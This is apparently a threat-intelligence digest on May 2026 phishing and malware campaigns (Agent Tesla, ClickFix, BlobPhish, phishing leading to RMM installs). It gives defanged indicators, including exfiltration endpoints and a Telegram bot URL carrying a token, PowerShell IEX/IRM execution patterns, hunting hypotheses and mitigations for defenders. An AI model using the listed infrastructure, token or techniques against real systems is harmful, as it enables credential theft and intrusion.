Major Cyber Attacks in May 2026: Fake Invitations, Agent Tesla, BlobPhish, and More
In May 2026, ANY.RUN observed a surge in sophisticated phishing and malware campaigns utilizing fileless execution, browser-based credential theft, and legitimate workflow abuse. Key threats included Agent Tesla credential harvesting, ClickFix fileless malware, BlobPhish in-memory page generation, and phishing-to-RMM chains bypassing traditional MFA via real-time OTP interception.
Authors: ANY.RUN
Source:
ANY.RUN
- domainclaimalerts-esl-org[.]cfdPhishing domain impersonating a financial organization for OTP interception.
- domainhoreca-bucuresti[.]roCompromised FTP server domain used for exfiltrating credentials in the Agent Tesla campaign.
- domainmtl-logistics[.]comDomain used in the BlobPhish campaign to load pseudo-MS365 pages as blob objects.
- domainrressseentrsvv[.]deDomain hosting a fake Word Online phishing page that triggers silent RMM deployment.
- ip158[.]94[.]208[.]104Payload host IP address serving my_new_l.bin and my_s.bin in the ClickFix attack chain.
- ip158[.]94[.]208[.]92Stage-2 PowerShell loader IP address used in the ClickFix attack chain.
- ip178[.]16[.]52[.]232PowerShell stager IP address used in the ClickFix attack chain.
- ip91[.]92[.]243[.]161Custom TCP C2 server IP address (port 3038) used in the ClickFix attack chain.
- urlhxxp://claimalerts-esl-org[.]cfd/otp[.]phpEndpoint used for OTP exfiltration in the OTP phishing campaign.
- urlhxxp://claimalerts-esl-org[.]cfd/pass[.]phpEndpoint used for credential exfiltration in the OTP phishing campaign.
- urlhxxps://api[.]telegram[.]org/bot7712998039:AAE_woKt3s2-PPJnELquYVNYJ64HWJwkApQ/sendMessageTelegram bot API URL used for exfiltrating stolen credentials and OTPs.
- urlhxxps://rressseentrsvv[.]de/share-point/attention[.]htmlSpecific URL hosting the fake Word Online phishing page.
Detection / HunterGoogle
What Happened
In May 2026, cybercriminals launched several deceptive attacks designed to look like normal business activities, such as fake event invitations and standard document sharing. These attacks targeted employees in finance, HR, and IT to steal passwords, intercept login codes, and secretly install remote access software. Because these threats hide within trusted websites and everyday tasks, they are much harder for standard security tools to catch. Organizations should ensure their security teams have the tools to analyze suspicious links and files in safe environments before they cause harm.
Key Takeaways
- Phishing campaigns are increasingly leading to direct access risks like credential theft, OTP interception, and RMM installation.
- Attackers are abusing trusted workflows (fake invitations, Word Online pages, B2B websites) to delay detection.
- Fileless and browser-based techniques (BlobPhish, injected scripts) are reducing visibility for traditional security controls.
- Real-time OTP interception is successfully bypassing standard MFA protections.
Affected Systems
- Windows
- Web Browsers
- Microsoft 365
- Corporate Email
- Finance and Banking Portals
Attack Chain
Attackers utilized various initial access vectors, including fake event invitations, business document lures, and compromised B2B websites. These lures redirected victims to credential harvesting pages, triggered fileless PowerShell execution (ClickFix), or initiated silent MSI installations of RMM tools like ScreenConnect. Once initial access or credentials were obtained, attackers exfiltrated data via FTP or Telegram bots, and established persistence using hidden remote access tools.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules, but mentions that ANY.RUN Enterprise Suite includes YARA Premium and TI Lookup capabilities for threat validation.
Detection Engineering Assessment
EDR Visibility: High — EDR solutions can detect PowerShell execution, process injection into svchost.exe, and the silent installation of RMM tools like ScreenConnect. Network Visibility: Medium — Network visibility is effective for detecting outbound connections to known C2 IPs and Telegram API exfiltration, but may struggle with BlobPhish in-memory page generation and encrypted traffic. Detection Difficulty: Moderate — The use of legitimate RMM tools, fileless execution, and in-browser blob generation complicates detection, requiring behavioral analysis rather than static signatures.
Required Log Sources
- Process Creation (Event ID 4688)
- PowerShell Operational Logs (Event ID 4104)
- Network Connection Logs
- DNS Query Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for unexpected PowerShell execution utilizing Invoke-Expression (IEX) or Invoke-RestMethod (IRM) originating from browser processes. | Process Creation, PowerShell Script Block Logging | Execution | Medium |
| Evaluate whether silent installations of RMM tools like ScreenConnect are occurring outside of approved IT maintenance windows. | Process Creation, File Creation | Persistence | Low |
| Consider hunting for unexpected outbound network connections to the Telegram API (api.telegram.org) from user endpoints, which may indicate data exfiltration. | Network Connection Logs, DNS Query Logs | Exfiltration | Low |
Control Gaps
- Traditional MFA (vulnerable to real-time OTP interception)
- Static URL filtering (bypassed by BlobPhish and compromised legitimate sites)
Key Behavioral Indicators
- PowerShell injecting into svchost.exe
- Execution of HideUL or similar concealment tools
- Browser processes spawning MSI installers
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider blocking the identified C2 IP addresses and phishing domains at the network perimeter.
- Evaluate whether recent installations of ScreenConnect or other RMM tools on user endpoints were authorized.
Infrastructure Hardening
- If supported by your identity provider, consider implementing FIDO2/WebAuthn hardware keys to mitigate real-time OTP interception.
- Evaluate whether PowerShell execution can be restricted to signed scripts only.
User Protection
- Consider implementing endpoint controls that restrict browser processes from launching command-line interpreters or installers.
- If applicable, evaluate whether access to known file-sharing and remote access domains can be restricted for non-IT personnel.
Security Awareness
- Consider updating security awareness training to highlight the risks of fake event invitations and unexpected business document lures.
- Evaluate whether employees can be trained to verify the legitimacy of OTP requests and recognize signs of browser-based phishing.
MITRE ATT&CK Mapping
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1055 - Process Injection
- T1119 - Automated Collection
- T1048 - Exfiltration Over Alternative Protocol
- T1219 - Remote Access Software
- T1564 - Hide Artifacts
Additional IOCs
- Urls:
hxxp://claimalerts-esl-org[.]cfd/pass.php- Endpoint used for credential exfiltration in the OTP phishing campaign.hxxp://claimalerts-esl-org[.]cfd/otp.php- Endpoint used for OTP exfiltration in the OTP phishing campaign.hxxps://rressseentrsvv[.]de/share-point/attention.html- Specific URL hosting the fake Word Online phishing page.
- Command Lines:
- Purpose: Execute fileless ClickFix payload | Tools:
powershell.exe| Stage: Execution |IEX - Purpose: Execute fileless ClickFix payload via REST method | Tools:
powershell.exe| Stage: Execution |IRM
- Purpose: Execute fileless ClickFix payload | Tools:
- Other:
my_new_l.bin- In-memory payload executed inside powershell.exe during the ClickFix attack.my_s.bin- .NET payload injected into svchost.exe during the ClickFix attack.HideUL_x64.exe- Activity concealment tool executed after silent RMM deployment.